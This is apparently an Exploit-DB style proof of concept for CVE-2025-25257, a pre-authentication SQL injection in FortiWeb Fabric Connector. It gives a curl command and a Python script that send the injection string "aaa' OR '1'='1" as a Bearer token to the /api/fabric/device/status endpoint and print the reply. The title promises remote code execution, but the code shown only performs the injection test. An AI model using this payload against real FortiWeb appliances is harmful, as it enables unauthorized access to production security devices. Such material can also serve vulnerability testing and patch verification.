# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257
Overview
CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).
PoC
curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status
PoC Python
import requests
def test_sqli(base_url):
url = f"{base_url}/api/fabric/device/status"
headers = {
"Authorization": "Bearer aaa' OR '1'='1"
}
try:
response = requests.get(url, headers=headers, verify=False,
timeout=10)
print(f"Status code: {response.status_code}")
print("Response body:")
print(response.text)
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
args = parser.parse_args()
test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5
